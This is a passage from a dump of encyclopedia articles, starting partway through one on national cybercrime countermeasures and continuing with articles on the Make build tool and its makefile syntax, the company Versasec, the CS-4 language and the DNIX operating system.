In 2004, the London Action Plan was founded, which aims at promoting international spam enforcement cooperation and address spam related problems, such as online fraud and deception, phishing, and dissemination of viruses.
Case analysis
U.S.
According to Sophos, the U.S. remains the top-spamming country and the source of about one-fifth of the world's spam. Cross-border cyber-exfiltration operations are in tension with international legal norms, so U.S. law enforcement efforts to collect foreign cyber evidence raises complex jurisdictional questions. Since fighting cybercrime involves great amount of sophisticated legal and other measures, only milestones rather than full texts are provided here.
Legal and regulatory measures
The first federal computer crime statute was the Computer Fraud and Abuse Act of 1984 (CFAA).
In 1986, Electronic Communications Privacy Act (ECPA) was an amendment to the federal wiretap law.
“National Infrastructure Protection Act of 1996”.
“Cyberspace Electronic Security Act of 1999”.
“Patriot Act of 2001”.
Digital Millennium Copyright Act (DMCA) was enacted in 1998.
Cyber Security Enhancement Act (CSEA) was passed in 2002.
Can-spam law issued in 2003 and subsequent implementation measures were made by FCC and FTC.
In 2005 the USA passed the Anti-Phishing Act which added two new crimes to the US Code.
In 2009, the Obama Administration released Cybersecurity Report and policy.
Cybersecurity Act of 2010, a bill seeking to increase collaboration between the public and the private sector on cybersecurity issues.
A number of agencies have been set up in the U.S. to fight against cybercrime, including the FBI, National Infrastructure Protection Center, National White Collar Crime Center, Internet Fraud Complaint Center, Computer Crime and Intellectual Property Section of the Department of Justice (DoJ), Computer Hacking and Intellectual Property Unit of the DoJ, and Computer Emergency Readiness Team/Coordination Center (CERT/CC) at Carnegie-Mellon, and so on.
CyberSafe is a public service project designed to educate end users of the Internet about the critical need for personal computer security.
Technical measures
Cloud computing: It can make infrastructures more resilient to attacks and functions as data backup as well. However, as the Cloud concentrates more and more sensitive data, it becomes increasingly attractive to cybercriminals.
Better encryption methods are developed to deal with phishing, smishing and other illegal data interception activities.
The Federal Bureau of Investigation has set up special technical units and developed Carnivore, a computer surveillance system which can intercept all packets that are sent to and from the ISP where it is installed, to assist in the investigation of cybercrime.
Industry collaboration
Public-private partnership: in 2006, the Internet Corporation for Assigned Names and Numbers (ICANN) signed an agreement with the United States Department of Commerce (United States Department of Commerce) that they partnered through the Multistakeholder Model of consultation.
In 2008, the second annual Cyber Storm Exercise conference was held, involving nine states, four foreign governments, 18 federal agencies and 40 private companies.
In 2010, National Cyber Security Alliance’s public awareness campaign was launched in partnership with the U.S. Department of Homeland Security, the Federal Trade Commission, and others.
Incentives for ISP: Though the cost of security measures increases, Internet Service Providers (ISP) are encouraged to fight against cybercrime to win consumer support, good reputation and brand image among consumer and peer ISP as well.
International cooperation
USA has signed and also ratified Convention on Cybercrime.
United States has actively participated in G8/OECD/APEC/OAS/U.S.-China cooperation in cracking down international cyber crime.
Future challenges
Privacy in tracking down cybercrime is being challenged and becomes a controversial issue.
Public-private partnership. As the U.S. government gets more involved in the development of IT products, many companies worry this may stifle their innovation, even undermining efforts to develop more secure technology products. New legislative proposals now being considered by the U.S. Congress could be potentially intrusive on private industry, which may prevent enterprises from responding effectively to emerging and changing threats. Cyber attacks and security breaches are increasing in frequency and sophistication, they are targeting organizations and individuals with malware and anonymization techniques that can evade current security controls. Current perimeter-intrusion detection, signature-based malware, and anti-virus solutions are providing little defense. Relatively few organizations have recognized organized cyber criminal networks, rather than hackers, as their greatest potential cyber security threat; even fewer are prepared to address this threat.
China
In January 2009, China was ranked No.3 spam-producing country in the world, according to data compiled by security vendor Sophos. Sophos now ranks China as spam producer No.20, right behind Spain.
China's underground economy is booming with estimated 10 billion RMB in 2009. Hacking, malware and spam are immensely popular. With patriotic hacktivism, people hack to defend the country.
Legal and regulatory measures
Criminal Law – the basic law identifies the law enforcement concerning cybercrime.
In 2000, the Decision on Internet Security of the Standing Committee of the NPC was passed.
In 2000, China issued a series of Internet rules that prohibit anyone to propagate pornography, virus and scams.
In 2003, China signed UN General Assembly Resolution 57/239 on “Creation of a global culture of cybersecurity”.
In 2003, China signed Geneva Declaration of Principles of the World Summit on the Information Society.
In 2006, an anti-spam initiative was launched.
In July 2006, the ASEAN Regional Forum (ARF), which included China, issued a statement that its members should implement cybercrime and cybersecurity laws “in accordance with their national conditions and by referring to relevant international instruments”.
In 2009, ASEAN-China framework agreement on network and information security emergency response were adopted.
In 2009, agreement within the Shanghai Cooperation Organization on information security was made.
Technical measures
Internet censorship: China has made it tougher to register new Internet domains and has put on stricter content control to help reduce spam.
"Golden Shield Project" or "The Great Firewall of China": a national Internet control and censorship project.
In 2009, Green Dam software: It restricts access to a secret list of sites, and monitors users’activity.
Operating system change: China is trying to get around this by using Linux, though with a lot of technical impediments to solve.
Industry collaboration
Internet Society of China — the group behind China's anti-spam effort — is working on standards and better ways of cooperating to fight cybercrime.
ISPs have become better at working with customers to cut down on the spam problem.
International cooperation
In 2005, China signed up for the London Action Plan on spam, an international effort to curb the problem.
Anti-Spam “Beijing Declaration”2006 International Anti-Spam Summit was held.
The APEC Working Group on Telecommunications agreed an action plan for 2010–2015 that included “fostering a safe and trusted ICT environment”.
In January 2011, the United States and China committed for the first time at head of state level to work together on a bilateral basis on issues of cybersecurity. "Fighting Spam to Build Trust" will be the first effort to help overcome the trust deficit between China and the United States on cybersecurity. Cyber Security China Summit 2011 will be held in Shanghai.
Achievement and future challenges
Successfully cracking down spam volume in 2009. However, insufficient criminal laws and regulations are great impediments in fighting cybercrime. A lack of electronic evidence laws or regulations, low rank of existing internet control regulations and technological impediments altogether limit the efficiency of Chinese governments' law enforcement.
See also
Computer crime
Computer security
Convention on Cybercrime
Cyberethics
Cyberstalking
Identity theft
Internet fraud
Legal aspects of computing
References
External links
ITU Global Cybersecurity Agenda
Convention on Cybercrime
Sophos Security Reports
US-China Joint Efforts in Cybercrime, EastWest Institute
Computer Crime & Intellectual Property Section, United States Department of Justice
Handbook of Legal Procedures of Computer and Network Misuse in EU Countries
Cybercrime
International criminal law
|
176194
|
https://en.wikipedia.org/wiki/Make%20%28software%29
|
Make (software)
|
In software development, Make is a build automation tool that automatically builds executable programs and libraries from source code by reading files called Makefiles which specify how to derive the target program. Though integrated development environments and language-specific compiler features can also be used to manage a build process, Make remains widely used, especially in Unix and Unix-like operating systems.
Besides building programs, Make can be used to manage any project where some files must be updated automatically from others whenever the others change.
Origin
There are now a number of dependency-tracking build utilities, but Make is one of the most widespread, primarily due to its inclusion in Unix, starting with the PWB/UNIX 1.0, which featured a variety of tools targeting software development tasks. It was originally created by Stuart Feldman in April 1976 at Bell Labs. Feldman received the 2003 ACM Software System Award for the authoring of this widespread tool.
Feldman was inspired to write Make by the experience of a coworker in futilely debugging a program of his where the executable was accidentally not being updated with changes:
Before Make's introduction, the Unix build system most commonly consisted of operating system dependent "make" and "install" shell scripts accompanying their program's source. Being able to combine the commands for the different targets into a single file and being able to abstract out dependency tracking and archive handling was an important step in the direction of modern build environments.
Derivatives
Make has gone through a number of rewrites, including a number of from-scratch variants which used the same file format and basic algorithmic principles and also provided a number of their own non-standard enhancements. Some of them are:
Sun DevPro Make appeared in 1986 with SunOS-3.2. With SunOS-3.2, It was delivered as optional program; with SunOS-4.0, SunPro Make was made the default Make program. In December 2006, Sun DevPro Make was made open source as part of the efforts to open-source Solaris.
dmake or Distributed Make that came with Sun Solaris Studio as its default Make, but not the default one on the Solaris Operating System (SunOS). It was originally required to build OpenOffice, but in 2009 the build system was rewritten to use GNU Make. While Apache OpenOffice still contains a mixture of both build systems, the much more actively developed LibreOffice only uses the modernized "gbuild" now.
BSD Make (pmake, bmake or fmake), which is derived from Adam de Boor's work on a version of Make capable of building targets in parallel, and survives with varying degrees of modification in FreeBSD, NetBSD and OpenBSD. Distinctively, it has conditionals and iterative loops which are applied at the parsing stage and may be used to conditionally and programmatically construct the makefile, including generation of targets at runtime.
GNU Make (short gmake) is the standard implementation of Make for Linux and macOS. It provides several extensions over the original Make, such as conditionals. It also provides many built-in functions which can be used to eliminate the need for shell-scripting in the makefile rules as well as to manipulate the variables set and used in the makefile. For example, the foreach function can be used to iterate over a list of values, such as the names of files in a given directory. GNU Make is required for building many software systems, including GCC (since version 3.4), the Linux kernel, Apache OpenOffice, LibreOffice, and Mozilla Firefox.
Rocky Bernstein's Remake is a fork of GNU Make and provides several extensions over GNU Make, such as better location and error-location reporting, execution tracing, execution profiling, and it contains a debugger.
Glenn Fowler's nmake is unrelated to the Microsoft program of the same name. Its input is similar to Make, but not compatible. This program provides shortcuts and built-in features, which according to its developers reduces the size of makefiles by a factor of 10.
Microsoft nmake, a command-line tool which normally is part of Visual Studio. It supports preprocessor directives such as includes and conditional expressions which use variables set on the command-line or within the makefiles. Inference rules differ from Make; for example they can include search paths. The Make tool supplied with Embarcadero products has a command-line option that "Causes MAKE to mimic Microsoft's NMAKE.". Qt Project's Jom tool is a clone of nmake.
Mk replaced Make in Research Unix, starting from version 9. A redesign of the original tool by Bell Labs programmer Andrew G. Hume, it features a different syntax. Mk became the standard build tool in Plan 9, Bell Labs' intended successor to Unix.
Kati is Google's replacement of GNU Make, used in Android OS builds. It translates the makefile into ninja for faster incremental builds.
POSIX includes standardization of the basic features and operation of the Make utility, and is implemented with varying degrees of completeness in Unix-based versions of Make. In general, simple makefiles may be used between various versions of Make with reasonable success. GNU Make, Makepp and some versions of BSD Make default to looking first for files named "GNUmakefile", "Makeppfile" and "BSDmakefile" respectively, which allows one to put makefiles which use implementation-defined behavior in separate locations.
Behavior
Make is typically used to build executable programs and libraries from source code. Generally though, Make is applicable to any process that involves executing arbitrary commands to transform a source file to a target result. For example, Make could be used to detect a change made to an image file (the source) and the transformation actions might be to convert the file to some specific format, copy the result into a content management system, and then send e-mail to a predefined set of users indicating that the actions above were performed.
Make is invoked with a list of target file names to build as command-line arguments:
make [TARGET ...]
Without arguments, Make builds the first target that appears in its makefile, which is traditionally a symbolic "phony" target named all.
Make decides whether a target needs to be regenerated by comparing file modification times. This solves the problem of avoiding the building of files which are already up to date, but it fails when a file changes but its modification time stays in the past. Such changes could be caused by restoring an older version of a source file, or when a network filesystem is a source of files and its clock or time zone is not synchronized with the machine running Make. The user must handle this situation by forcing a complete build. Conversely, if a source file's modification time is in the future, it triggers unnecessary rebuilding, which may inconvenience users.
Makefiles are traditionally used for compiling code (*.c, *.cc, *.C, etc.), but they can also be used for providing commands to automate common tasks. One such makefile is called from the command line:
make # Without argument runs first TARGET
make help # Show available TARGETS
make dist # Make a release archive from current dir
Makefile
Make searches the current directory for the makefile to use, e.g. GNU Make searches files in order for a file named one of , , or and then runs the specified (or default) target(s) from (only) that file.
The makefile language is similar to declarative programming. This class of language, in which necessary end conditions are described but the order in which actions are to be taken is not important, is sometimes confusing to programmers used to imperative programming.
One problem in build automation is the tailoring of a build process to a given platform. For instance, the compiler used on one platform might not accept the same options as the one used on another. This is not well handled by Make. This problem is typically handled by generating platform-specific build instructions, which in turn are processed by Make. Common tools for this process are Autoconf, CMake or GYP (or more advanced NG).
Makefiles may contain five kinds of things:
An explicit rule says when and how to remake one or more files, called the rule's targets. It lists the other files that the targets depend on, called the prerequisites of the target, and may also give a recipe to use to create or update the targets.
An implicit rule says when and how to remake a class of files based on their names. It describes how a target may depend on a file with a name similar to the target and gives a recipe to create or update such a target.
A variable definition is a line that specifies a text string value for a variable that can be substituted into the text later.
A directive is an instruction for make to do something special while reading the makefile such as reading another makefile.
Lines starting with are used for comments.
Rules
A makefile consists of rules. Each rule begins with a textual dependency line which defines a target followed by a colon (:) and optionally an enumeration of components (files or other targets) on which the target depends. The dependency line is arranged so that the target (left hand of the colon) depends on components (right hand of the colon). It is common to refer to components as prerequisites of the target.
target [target ...]: [component ...]
[command 1]
.
.
.
[command n]
Usually each rule has a single unique target, rather than multiple targets.
For example, a C .o object file is created from .c files, so .c files come first (i.e. specific object file target depends on a C source file and header files). Because Make itself does not understand, recognize or distinguish different kinds of files, this opens up a possibility for human error. A forgotten or an extra dependency may not be immediately obvious and may result in subtle bugs in the generated software. It is possible to write makefiles which generate these dependencies by calling third-party tools, and some makefile generators, such as the Automake toolchain provided by the GNU Project, can do so automatically.
Each dependency line may be followed by a series of TAB indented command lines which define how to transform the components (usually source files) into the target (usually the "output"). If any of the prerequisites has a more recent modification time than the target, the command lines are run. The GNU Make documentation refers to the commands associated with a rule as a "recipe".
The first command may appear on the same line after the prerequisites, separated by a semicolon,
targets : prerequisites ; command
for example,
hello: ; @echo "hello"
Make can decide where to start through topological sorting.
Each command line must begin with a tab character to be recognized as a command. The tab is a whitespace character, but the space character does not have the same special meaning. This is problematic, since there may be no visual difference between a tab and a series of space characters. This aspect of the syntax of makefiles is often subject to criticism; it has been described by Eric S. Raymond as "one of the worst design botches in the history of Unix" and The Unix-Haters Handbook said "using tabs as part of the syntax is like one of those pungee stick traps in The Green Berets". Feldman explains the choice as caused by a workaround for an early implementation difficulty preserved by a desire for backward compatibility with the very first users:
However, the GNU Make since version 3.82 allows to choose any symbol (one character) as the recipe prefix using the .RECIPEPREFIX special variable, for example:
.RECIPEPREFIX := :
all:
:@echo "recipe prefix symbol is set to '$(.RECIPEPREFIX)'"
Each command is executed by a separate shell or command-line interpreter instance. Since operating systems use different command-line interpreters this can lead to unportable makefiles. For instance, GNU Make (all POSIX Makes) by default executes commands with /bin/sh, where Unix commands like cp are normally used. In contrast to that, Microsoft's nmake executes commands with cmd.exe where batch commands like copy are available but not necessarily cp.
A rule may have no command lines defined. The dependency line can consist solely of components that refer to targets, for example:
realclean: clean distclean
The command lines of a rule are usually arranged so that they generate the target. An example: if is newer, it is converted to text. The contents of the makefile:
file.txt: file.html
lynx -dump file.html > file.txt
The rule above would be triggered when Make updates "file.txt". In the following invocation, Make would typically use this rule to update the "file.txt" target if "file.html" were newer.
make file.txt
Command lines can have one or more of the following three prefixes:
a hyphen-minus (-), specifying that errors are ignored
an at sign (@), specifying that the command is not printed to standard output before it is executed
a plus sign (+), the command is executed even if Make is invoked in a "do not execute" mode
Ignoring errors and silencing echo can alternatively be obtained via the special targets and .
Microsoft's NMAKE has predefined rules that can be omitted from these makefiles, e.g. .
Macros
A makefile can contain definitions of macros. Macros are usually referred to as variables when they hold simple string definitions, like . Macros in makefiles may be overridden in the command-line arguments passed to the Make utility. Environment variables are also available as macros.
Macros allow users to specify the programs invoked and other custom behavior during the build process. For example, the macro is frequently used in makefiles to refer to the location of a C compiler, and the user may wish to specify a particular compiler to use.
New macros (or simple "variables") are traditionally defined using capital letters:
MACRO = definition
A macro is used by expanding it. Traditionally this is done by enclosing its name inside . (Omitting the parentheses leads to Make interpreting the next letter after the as the entire variable name.) An equivalent form uses curly braces rather than parentheses, i.e. , which is the style used in the BSDs.
NEW_MACRO = $(MACRO)-$(MACRO2)
Macros can be composed of shell commands by using the command substitution operator, denoted by backticks ().
YYYYMMDD = ` date `
The content of the definition is stored "as is". Lazy evaluation is used, meaning that macros are normally expanded only when their expansions are actually required, such as when used in the command lines of a rule. An extended example:
PACKAGE = package
VERSION = ` date +"%Y.%m.%d" `
ARCHIVE = $(PACKAGE)-$(VERSION)
dist:
# Notice that only now macros are expanded for shell to interpret:
# tar -cf package-`date +"%Y.%m.%d"`.tar
tar -cf $(ARCHIVE).tar .
The generic syntax for overriding macros on the command line is:
make MACRO="value" [MACRO="value" ...] TARGET [TARGET ...]
Makefiles can access any of a number of predefined internal macros, with and being the most common.
target: component1 component2
# contains those components which need attention (i.e. they ARE YOUNGER than current TARGET).
echo $?
# evaluates to current TARGET name from among those left of the colon.
echo $@
A somewhat common syntax expansion is the use of , , and instead of the equal sign. It works on BSD and GNU makes alike.
Suffix rules
Suffix rules have "targets" with names in the form and are used to launch actions based on file extension. In the command lines of suffix rules, POSIX specifies that the internal macro refers to the first prerequisite and refers to the target. In this example, which converts any HTML file into text, the shell redirection token is part of the command line whereas is a macro referring to the HTML file:
.SUFFIXES: .txt .html
# From .html to .txt
.html.txt:
lynx -dump $< > $@
When called from the command line, the example above expands.
$ make -n file.txt
lynx -dump file.html > file.txt
Pattern rules
Suffix rules cannot have any prerequisites of their own. If they have any, they are treated as normal files with unusual names, not as suffix rules. GNU Make supports suffix rules for compatibility with old makefiles but otherwise encourages usage of pattern rules.
A pattern rule looks like an ordinary rule, except that its target contains exactly one character within the string. The target is considered a pattern for matching file names: the can match any substring of zero or more characters, while other characters match only themselves. The prerequisites likewise use to show how their names relate to the target name.
The example above of a suffix rule would look like the following pattern rule:
# From %.html to %.txt
%.txt : %.html
lynx -dump $< > $@
Other elements
Single-line comments are started with the hash symbol (#).
Some directives in makefiles can include other makefiles.
Line continuation is indicated with a backslash character at the end of a line.
target: component \
component
command ; \
command | \
piped-command
Example makefiles
The makefile:
PACKAGE = package
VERSION = ` date "+%Y.%m%d%" `
RELEASE_DIR = ..
RELEASE_FILE = $(PACKAGE)-$(VERSION)
# Notice that the variable LOGNAME comes from the environment in
# POSIX shells.
#
# target: all - Default target. Does nothing.
all:
echo "Hello $(LOGNAME), nothing to do by default"
# sometimes: echo "Hello ${LOGNAME}, nothing to do by default"
echo "Try 'make help'"
# target: help - Display callable targets.
help:
egrep "^# target:" [Mm]akefile
# target: list - List source files
list:
# Won't work. Each command is in separate shell
cd src
ls
# Correct, continuation of the same shell
cd src; \
ls
# target: dist - Make a release.
dist:
tar -cf $(RELEASE_DIR)/$(RELEASE_FILE) && \
gzip -9 $(RELEASE_DIR)/$(RELEASE_FILE).tar
Below is a very simple makefile that by default (the "all" rule is listed first) compiles a source file called "helloworld.c" using the system's C compiler and also provides a "clean" target to remove the generated files if the user desires to start over. The and are two of the so-called internal macros (also known as automatic variables) and stand for the target name and "implicit" source, respectively. In the example below, expands to a space delimited list of the prerequisites. There are a number of other internal macros.
CFLAGS ?= -g
all: helloworld
helloworld: helloworld.o
# Commands start with TAB not spaces
$(CC) $(LDFLAGS) -o $@ $^
helloworld.o: helloworld.c
$(CC) $(CFLAGS) -c -o $@ $<
clean: FRC
$(RM) helloworld helloworld.o
# This pseudo target causes all targets that depend on FRC
# to be remade even in case a file with the name of the target exists.
# This works with any make implementation under the assumption that
# there is no file FRC in the current directory.
FRC:
Many systems come with predefined Make rules and macros to specify common tasks such as compilation based on file suffix. This lets users omit the actual (often unportable) instructions of how to generate the target from the source(s). On such a system the makefile above could be modified as follows:
all: helloworld
helloworld: helloworld.o
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
clean: FRC
$(RM) helloworld helloworld.o
# This is an explicit suffix rule. It may be omitted on systems
# that handle simple rules like this automatically.
.c.o:
$(CC) $(CFLAGS) -c $<
FRC:
.SUFFIXES: .c
That "helloworld.o" depends on "helloworld.c" is now automatically handled by Make. In such a simple example as the one illustrated here this hardly matters, but the real power of suffix rules becomes evident when the number of source files in a software project starts to grow. One only has to write a rule for the linking step and declare the object files as prerequisites. Make will then implicitly determine how to make all the object files and look for changes in all the source files.
Simple suffix rules work well as long as the source files do not depend on each other and on other files such as header files. Another route to simplify the build process is to use so-called pattern matching rules that can be combined with compiler-assisted dependency generation. As a final example requiring the gcc compiler and GNU Make, here is a generic makefile that compiles all C files in a folder to the corresponding object files and then links them to the final executable. Before compilation takes place, dependencies are gathered in makefile-friendly format into a hidden file ".depend" that is then included to the makefile. Portable programs ought to avoid constructs used below.
# Generic GNUMakefile
# Just a snippet to stop executing under other make(1) commands
# that won't understand these lines
ifneq (,)
This makefile requires GNU Make.
endif
PROGRAM = foo
C_FILES := $(wildcard *.c)
OBJS := $(patsubst %.c, %.o, $(C_FILES))
CC = cc
CFLAGS = -Wall -pedantic
LDFLAGS =
LDLIBS = -lm
all: $(PROGRAM)
$(PROGRAM): .depend $(OBJS)
$(CC) $(CFLAGS) $(OBJS) $(LDFLAGS) -o $(PROGRAM) $(LDLIBS)
depend: .depend
.depend: cmd = gcc -MM -MF depend $(var); cat depend >> .depend;
.depend:
@echo "Generating dependencies..."
@$(foreach var, $(C_FILES), $(cmd))
@rm -f depend
-include .depend
# These are the pattern matching rules. In addition to the automatic
# variables used here, the variable $* that matches whatever % stands for
# can be useful in special cases.
%.o: %.c
$(CC) $(CFLAGS) -c $< -o $@
%: %.o
$(CC) $(CFLAGS) -o $@ $<
clean:
rm -f .depend $(OBJS)
.PHONY: clean depend
See also
List of build automation software
Dependency graph
References
External links
GNU Make homepage
Practical Makefiles, by Example
Writing and Debugging a Makefile
"Ask Mr. Make" series of article about GNU Make
Managing Projects with GNU make -- 3.xth edition
What is wrong with make?
What’s Wrong With GNU make?
Recursive Make Considered Harmful
Advanced Auto-Dependency Generation.
Using NMake
Make7 - A portable open source make utility written in Seed7
Microsoft's NMAKE predefined rules.
Articles with example code
Build automation
Compiling tools
GNU Project software
Unix programming tools
Unix SUS2008 utilities
|
48954135
|
https://en.wikipedia.org/wiki/Versasec
|
Versasec
|
Versasec AB (registration number: 556739–0124) was founded in 2007 in Stockholm, Sweden. The company produces and sells identity management software for computer security and has specialized in software connecting smart cards to computer systems.
Versasec has developed three product lines:
vSEC:CMS –credential or smart card management systems for managing PKI tokens, smart cards and digital certificates, generally with the intention to use the credentials as identification tokens and badges in organizations to enable multi-factor authentication and non-repudiation
vSEC:ID – software for enabling public key operations using smart cards in organizations, for example to use digital signatures
vSEC:MAIL – software that enables organizations to communicate using encrypted and/or digitally signed email messages
The company has a partnership with Thales CPL(previously Gemalto). The Versasec-Thales partnership began in 2010, and enables the company to offer its products through the Thales partner network. Thales offers vSEC:CMS as part of their product portfolio.
Versasec currently has offices in the following countries:
Sweden - (Headquarters, Versasec AB, Stockholm and Uppsala)
Germany - (Research center, Merseburg)
United Kingdom - (Versasec LTD, Portsmouth)
United States - (Versasec LLC, Austin, TX)
Malaysia - (Asia-Pacific Sales and Services, Kuala Lumpur)
Egypt - (Middle East Sales and Services, Cairo)
During its first four years, Versasec was self-financed. In 2011 the company conducted its first round of financing, raising capital from investors in Sweden, including Almi Invest and Stockholms Affärsänglar (STOAF).
Versasec has been awarded the Dagens industri (Di) Gasell award three years in a row (2017, 2018 and 2019), recognizing that Versasec as one of the fastest growing profitable companies in Sweden.
External links
Versasec versasec.com
Versasec Partner Network
Security Magazine:
Security Magazine:
Security InfoWatch:
Notes
Smart cards
Software companies established in 2007
Companies based in Stockholm
Swedish companies established in 2007
Software companies of Sweden
|
51237175
|
https://en.wikipedia.org/wiki/CS-4%20%28programming%20language%29
|
CS-4 (programming language)
|
CS-4 is a programming language and an operating system interface. It was developed in the early 1970s at Intermetrics in Cambridge, Massachusetts. The first published manual was released in December 1973, entitled "CS-4 Language Reference Manual and Operating System Interface". The document had three parts: CS-4 Base Language Capabilities; CS-4 Operating System Interface; and Overview of Full CS-4 Capabilities.
History
Little is known about the CS-4 language, but it was developed for the United States Navy in the 1970s, and was an ongoing research project, which was continuing the study of extensibility and abstraction techniques to develop a requirement of the language to be simple and compact. The language was first documented in 1973 by Miller et al., and was revised in 1975 to allow "data abstractions and more powerful extension facilities".
Descendants
Praxis explicitly refers to CS-4 as a predecessor language.
References
Procedural programming languages
Programming languages created in 1973
Concurrent programming languages
Systems programming languages
|
51172
|
https://en.wikipedia.org/wiki/DNIX
|
DNIX
|
DNIX (original spelling: D-Nix) is a discontinued Unix-like real-time operating system from the Swedish company Dataindustrier AB (DIAB). A version called ABCenix was also developed for the ABC 1600 computer from Luxor. (Daisy Systems also had something called Daisy DNIX on some of their CAD workstations. It was unrelated to DIAB's product.)
History
Inception at DIAB in Sweden
Dataindustrier AB (literal translation: computer industries shareholding company) was started in 1970 by Lars Karlsson as a single-board computer manufacture in Sundsvall, Sweden, producing a Zilog Z80-based computer called Data Board 4680. In 1978 DIAB started to work with the Swedish television company Luxor AB to produce the home and office computer series ABC 80 and ABC 800.
In 1983 DIAB independently developed the first UNIX-compatible machine, DIAB DS90 based on the Motorola 68000 CPU. D-NIX here made its appearance, based on a UNIX System V license from AT&T. DIAB was however an industrial automation company, and needed a real-time operating system, so the company replaced the AT&T-supplied UNIX kernel with their own in-house developed, yet compatible real-time variant. This kernel was originally a Z80 kernel called OS8.
Over time, the company also replaced several of the UNIX standard userspace tools with their own implementations, to the point where no code was derived from UNIX, and their machines could be deployed independently of any AT&T UNIX license. Two years later and in cooperation with Luxor, a computer called ABC 1600 was developed for the office market, while in parallel, DIAB continue to produce enhanced versions of the DS90 computer using newer versions of the Motorola CPUs such as Motorola 68010, 68020, 68030 and eventually 68040. In 1990 DIAB was acquired by Groupe Bull who continued to produce and support the DS machines under the brand name DIAB, with names such as DIAB 2320, DIAB 2340 etc., still running DIABs version of DNIX.
Derivative at ISC Systems Corporation
ISC Systems Corporation (ISC) purchased the right to use DNIX in the late 1980s for use in its line of Motorola 68k-based banking computers. (ISC was later bought by Olivetti, and was in turn resold to Wang, which was then bought by Getronics. This corporate entity, most often referred to as 'ISC', has answered to a bewildering array of names over the years.) This code branch was the SVR2 compatible version, and received extensive modification and development at their hands. Notable features of this operating system were its support of demand paging, diskless workstations, multiprocessing, asynchronous I/O, the ability to mount processes (handlers) on directories in the file system, and message passing. Its real-time support consisted largely of internal event-driven queues rather than list search mechanisms (no 'thundering herd'), static process priorities in two classes (run to completion and timesliced), support for contiguous files (to avoid fragmentation of critical resources), and memory locking. The quality of the orthogonal asynchronous event implementation has yet to be equalled in current commercial operating systems, though some approach it. (The concept that has yet to be adopted is that the synchronous marshalling point of all the asynchronous activity itself could be asynchronous, ad infinitum. DNIX handled this with aplomb.) The asynchronous I/O facility obviated the need for Berkeley sockets select or SVR4's STREAMS poll mechanism, though there was a socket emulation library that preserved the socket semantics for backward compatibility. Another feature of DNIX was that none of the standard utilities (such as ps, a frequent offender) rummaged around in the kernel's memory to do their job. System calls were used instead, and this meant the kernel's internal architecture was free to change as required. The handler concept allowed network protocol stacks to be outside the kernel, which greatly eased development and improved overall reliability, though at a performance cost. It also allowed for foreign file systems to be user-level processes, again for improved reliability. The main file system, though it could have been (and once was) an external process, was pulled into the kernel for performance reasons. Were it not for this DNIX could well have been considered a microkernel, though it was not formally developed as such. Handlers could appear as any type of 'native' Unix file, directory structure, or device, and file I/O requests that the handler itself could not process could be passed off to other handlers, including the underlying one upon which the handler was mounted. Handler connections could also exist and be passed around independent of the filesystem, much like a pipe. One effect of this is that TTY-like 'devices' could be emulated without requiring a kernel-based pseudo terminal facility.
An example of where a handler saved the day was in ISC's diskless workstation support, where a bug in the implementation meant that using named pipes on the workstation could induce undesirable resource locking on the fileserver. A handler was created on the workstation to field accesses to the afflicted named pipes until the appropriate kernel fixes could be developed. This handler required approximately 5 kilobytes of code to implement, an indication that a non-trivial handler did not need to be large.
ISC also received the right to manufacture DIAB's DS90-10 and DS90-20 machines as its file servers. The multiprocessor DS90-20's, however, were too expensive for the target market and ISC designed its own servers and ported DNIX to them. ISC designed its own GUI-based diskless workstations for use with these file servers, and ported DNIX again. (Though ISC used Daisy workstations running Daisy DNIX to design the machines that would run DIAB's DNIX, there was negligible confusion internally as the drafting and layout staff rarely talked to the software staff. Moreover, the hardware design staff didn't use either system! The running joke went something like: "At ISC we build computers, we don't use them.") The asynchronous I/O support of DNIX allowed for easy event-driven programming in the workstations, which performed well even though they had relatively limited resources. (The GUI diskless workstation had a 7 MHz 68010 processor and was usable with only 512K of memory, of which the kernel consumed approximately half. Most workstations had 1 MB of memory, though there were later 2 MB and 4 MB versions, along with 10 MHz processors.) A full-blown installation could consist of one server (16 MHz 68020, 8 MB of RAM, and a 200 MB hard disk) and up to 64 workstations. Though slow to boot up, such an array would perform acceptably in a bank teller application. Besides the innate efficiency of DNIX, the associated DIAB C compiler was key to high performance. It generated particularly good code for the 68010, especially after ISC got done with it. (ISC also retargeted it to the Texas Instruments TMS34010 graphics coprocessor used in its last workstation.) The DIAB C compiler was, of course, used to build DNIX itself which was one of the factors contributing to its efficiency, and is still available (in some form) through Wind River Systems.
These systems are still in use as of this writing in 2006, in former Seattle-First National Bank branches now branded Bank of America. There may be, and probably are, other ISC customers still using DNIX in some capacity. Through ISC there was a considerable DNIX presence in Central and South America.
Asynchronous events
DNIX's native system call was the dnix(2) library function, analogous to the standard Unix unix(2) or syscall(2) function. It took multiple arguments, the first of which was a function code. Semantically this single call provided all appropriate Unix functionality, though it was syntactically different from Unix and had, of course, numerous DNIX-only extensions.
DNIX function codes were organized into two classes: Type 1 and Type 2. Type 1 commands were those that were associated with I/O activity, or anything that could potentially cause the issuing process to block. Major examples were F_OPEN, F_CLOSE, F_READ, F_WRITE, F_IOCR, F_IOCW, F_WAIT, and F_NAP. Type 2 were the remainder, such as F_GETPID, F_GETTIME, etc. They could be satisfied by the kernel itself immediately.
To invoke asynchronicity, a special file descriptor called a trap queue had to have been created via the Type 2 opcode F_OTQ. A Type 1 call would have the F_NOWAIT bit OR-ed with its function value, and one of the additional parameters to dnix(2) was the trap queue file descriptor. The return value from an asynchronous call was not the normal value but a kernel-assigned identifier. At such time as the asynchronous request completed, a read(2) (or F_READ) of the trap queue file descriptor would return a small kernel-defined structure containing the identifier and result status. The F_CANCEL operation was available to cancel any asynchronous operation that hadn't yet been completed, one of its arguments was the kernel-assigned identifier. (A process could only cancel requests that were currently owned by itself. The exact semantics of cancellation was up to each request's handler, fundamentally it only meant that any waiting was to be terminated. A partially completed operation could be returned.) In addition to the kernel-assigned identifier, one of the arguments given to any asynchronous operation was a 32-bit user-assigned identifier. This most often referenced a function pointer to the appropriate subroutine that would handle the I/O completion method, but this was merely convention. It was the entity that read the trap queue elements that was responsible for interpreting this value.
struct itrq { /* Structure of data read from trap queue. */
short it_stat; /* Status */
short it_rn; /* Request number */
long it_oid; /* Owner ID given on request */
long it_rpar; /* Returned parameter */
};
